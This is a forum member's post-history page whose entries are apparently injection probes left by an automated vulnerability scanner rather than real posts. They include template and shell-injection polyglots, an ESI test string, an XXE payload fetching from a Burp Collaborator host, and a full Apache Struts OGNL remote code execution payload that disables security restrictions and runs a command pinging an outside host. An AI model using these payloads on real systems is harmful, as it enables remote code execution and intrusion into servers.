Jump to content

NytroRST

Members
  • Posts

    8
  • Joined

  • Last visited

Everything posted by NytroRST

  1. o1i04\z`z'z"${{%{{\

  2. h6wuu3xbo8`z'z"${{%{{\

  3. vvvvvvvvvvv &zq=%3c%61%60%27%22%24%7b%7b%5c

  4. vvvvvvvvvvv |zq=%3c%61%60%27%22%24%7b%7b%5c

  5. vvvvvvvvvvv &zq=x%3c%61%60%27%22%24%7b%7b%5c

  6. vvvvvvvvvvv $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d

  7. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping 96d093ad32r0pwuf0hy2n04r3i98xx.burpcollaborator.net -c1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  8. {!xmlparser v='<!DOCTYPE a SYSTEM "http://mvl01rgw16x3jxjtbjiqxhkq0h67uw.burpcollaborator.net/xxe"><a></a>'}

  9. vu0p<!--esi-->4k52<!--esx-->m54b

  10. a'a\'b"c>?>%}}%%>c<[[?${{%}}cake\

×
×
  • Create New...